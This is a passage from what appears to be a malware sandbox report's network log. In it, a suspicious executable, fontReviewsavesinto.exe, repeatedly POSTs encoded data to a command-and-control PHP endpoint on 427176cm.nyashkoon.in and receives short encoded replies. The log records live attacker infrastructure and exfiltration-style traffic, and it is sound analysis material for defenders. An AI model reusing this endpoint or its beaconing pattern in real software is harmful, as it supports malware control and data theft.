                                        Nov 5, 2024 08:13:03.958697081 CET1032OUTData Raw: 5b 5d 43 59 59 54 5f 56 5e 5e 54 55 56 58 5a 5b 5f 55 59 5e 52 5b 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CYYT_V^^TUVXZ[_UY^R[R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$1,['-'2$],;*_'')[-$90[43#*&G!']*/
                                        Nov 5, 2024 08:13:04.410329103 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:04.489789009 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        54192.168.2.75002437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:04.619370937 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:04.974268913 CET1032OUTData Raw: 5e 58 43 5e 5c 59 5f 50 5e 5e 54 55 56 53 5a 51 5f 55 59 5c 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC^\Y_P^^TUVSZQ_UY\R_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%2,_$1X$_/0_>0X$8)[5'<&_&=3()&G!']*
                                        Nov 5, 2024 08:13:05.422631025 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:05.506674051 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        55192.168.2.75002537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:05.632958889 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:05.990072012 CET1028OUTData Raw: 5b 5c 46 5a 59 5a 5a 50 5e 5e 54 55 56 5a 5a 5a 5f 52 59 5f 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\FZYZZP^^TUVZZZ_RY_RQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-%!$Z'>$ ^;80)%<'??(-V0,5$[#_38Y)&G!']*+


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        56192.168.2.75002637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:06.293687105 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:06.646330118 CET1300OUTData Raw: 5e 58 43 5c 59 5a 5f 51 5e 5e 54 55 56 5e 5a 5d 5f 5a 59 5d 52 5f 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC\YZ_Q^^TUV^Z]_ZY]R_R\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B3(Y'.:',[8,?5'',<)',:3.83^'>:&G!']*7
                                        Nov 5, 2024 08:13:07.116204023 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:07.192733049 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 01 25 28 0a 56 23 04 0c 50 2b 3d 24 5d 35 19 27 5a 2f 2e 28 10 27 55 37 0f 2a 2f 0c 1b 34 2a 2e 5a 21 13 24 5d 22 3e 2c 0b 2b 31 2f 5a 07 10 25 10 32 1c 0a 0c 25 10 20 13 27 55 27 5b 3e 3c 1a 5a 21 3b 3f 5b 26 15 2a 02 25 29 27 52 2f 2a 3a 0b 2d 3b 30 05 3a 21 2f 06 25 34 2c 54 0d 10 3a 0b 2a 32 24 52 2a 3f 25 58 32 37 24 10 37 2d 2f 1d 3e 5c 33 08 3f 04 25 05 30 20 1a 57 21 1c 0b 10 32 15 3c 58 30 31 24 53 26 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :%(V#P+=$]5'Z/.('U7*/4*.Z!$]">,+1/Z%2% 'U'[><Z!;?[&*%)'R/*:-;0:!/%4,T:*2$R*?%X27$7-/>\3?%0 W!2<X01$S&2%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        57192.168.2.75002737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:06.413358927 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:06.771173000 CET1028OUTData Raw: 5e 58 43 58 59 5a 5f 50 5e 5e 54 55 56 5a 5a 50 5f 53 59 59 52 5e 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XCXYZ_P^^TUVZZP_SYYR^RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$2$_%-.0-+'*68X3<#Z)-&P'/.Y$?Y'+=:&G!']*
                                        Nov 5, 2024 08:13:07.227076054 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:07.300396919 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        58192.168.2.75002837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:07.446343899 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:07.802480936 CET1032OUTData Raw: 5e 5d 43 52 59 5f 5a 50 5e 5e 54 55 56 5e 5a 5a 5f 56 59 5f 52 5d 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CRY_ZP^^TUV^ZZ_VY_R]RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C$"8[%--'!(;Y)C'0<7Y*"V3*]'>7Y3<=&G!']*7
                                        Nov 5, 2024 08:13:08.264884949 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:08.338540077 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        59192.168.2.75002937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:08.465864897 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:08.819047928 CET1032OUTData Raw: 5b 5a 43 53 59 5e 5a 5c 5e 5e 54 55 56 52 5a 5a 5f 52 59 58 52 5d 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZCSY^Z\^^TUVRZZ_RYXR]R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G$"#0%Y%"';;^*%0Z$<*=!$?)3=?$+*&G!']*
                                        Nov 5, 2024 08:13:09.276842117 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:09.355849028 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:07 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        60192.168.2.75003037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:09.497219086 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:09.849540949 CET1032OUTData Raw: 5e 58 46 59 5c 5a 5a 57 5e 5e 54 55 56 53 5a 5d 5f 52 59 5c 52 5a 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XFY\ZZW^^TUVSZ]_RY\RZRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@$T$Z0-2$'8+=C8X%,;_(-5'6$'$^'*&G!']*
                                        Nov 5, 2024 08:13:10.311350107 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:10.382385015 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        61192.168.2.75003137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:10.531526089 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:10.880650043 CET1032OUTData Raw: 5e 5d 43 5e 59 5d 5a 5d 5e 5e 54 55 56 5b 5a 51 5f 52 59 58 52 5f 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]C^Y]Z]^^TUV[ZQ_RYXR_RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$!33>&0" ,($=?%<7=..Q0,2]0=?]$;Z)*&G!']*#
                                        Nov 5, 2024 08:13:11.373348951 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:11.450525045 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        62192.168.2.75003237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:11.569096088 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1024
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:11.927396059 CET1024OUTData Raw: 5e 5f 46 5e 5c 59 5a 57 5e 5e 54 55 56 5a 5a 59 5f 50 59 5f 52 5a 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_F^\YZW^^TUVZZY_PY_RZR\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%2/'[%0;,];);08)."Q'%0=Y'7\**&G!']*+


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        63192.168.2.75003337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:12.214864969 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:12.568048000 CET1300OUTData Raw: 5e 5f 43 52 5c 5d 5a 53 5e 5e 54 55 56 5b 5a 59 5f 5a 59 5d 52 5a 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_CR\]ZS^^TUV[ZY_ZY]RZRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A'Y'!^32,;)C<_$*-*T3$$8#*&G!']*#
                                        Nov 5, 2024 08:13:13.018845081 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:13.102416992 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 00 25 28 0a 13 34 3a 35 0d 28 00 05 00 35 09 09 59 2f 13 37 04 25 30 28 54 2b 3c 32 1b 23 2a 2e 59 21 3d 2c 5d 37 3d 33 10 3d 0b 2f 5a 07 10 25 1e 26 22 0d 1e 25 3e 20 5b 25 23 3c 03 2a 12 3c 10 36 02 2c 04 25 3b 21 13 26 3a 3b 51 3b 07 32 0f 2e 2b 3f 5d 2e 21 3c 5e 32 1e 2c 54 0d 10 3a 0b 3d 22 28 1c 29 3c 1b 5e 25 19 37 0c 34 13 06 03 3f 39 3c 19 28 5b 3d 07 33 09 3b 0e 21 54 2e 0a 31 28 3b 05 30 32 34 1a 24 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :%(4:5(5Y/7%0(T+<2#*.Y!=,]7=3=/Z%&"%> [%#<*<6,%;!&:;Q;2.+?].!<^2,T:="()<^%74?9<([=3;!T.1(;024$2%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        64192.168.2.75003437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:12.335807085 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:12.692996979 CET1032OUTData Raw: 5e 59 46 59 59 5b 5a 51 5e 5e 54 55 56 59 5a 5d 5f 5a 59 50 52 5a 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YFYY[ZQ^^TUVYZ]_ZYPRZR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F$;$1'+,8,Y=C4Y3$)[50/-$ 380>&G!']*+
                                        Nov 5, 2024 08:13:13.146820068 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:13.229721069 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:11 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        65192.168.2.75003537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:13.351840973 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:13.708748102 CET1032OUTData Raw: 5b 5d 43 59 59 55 5f 56 5e 5e 54 55 56 53 5a 58 5f 50 59 59 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CYYU_V^^TUVSZX_PYYRYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F'" ':%!?8$Y)X3<*=3"0[;$?=&G!']*
                                        Nov 5, 2024 08:13:14.164968967 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:14.235750914 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        66192.168.2.75003637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:14.366493940 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:14.724436998 CET1032OUTData Raw: 5b 5b 43 5f 59 5c 5f 51 5e 5e 54 55 56 52 5a 59 5f 57 59 5f 52 59 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[C_Y\_Q^^TUVRZY_WY_RYR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C'T$Y$9^'1',(Y)?3?*>)$,'?%($)&G!']*
                                        Nov 5, 2024 08:13:15.185641050 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:15.262294054 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:13 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        67192.168.2.75003737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:15.382910967 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:15.739856958 CET1032OUTData Raw: 5b 5a 46 58 59 5a 5f 57 5e 5e 54 55 56 5d 5a 5d 5f 50 59 51 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZFXYZ_W^^TUV]Z]_PYQR[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$(3=&%!'-($>&4X$Z?*&P'&_3='^ =&G!']*
                                        Nov 5, 2024 08:13:16.224509001 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:16.304879904 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:14 GMT
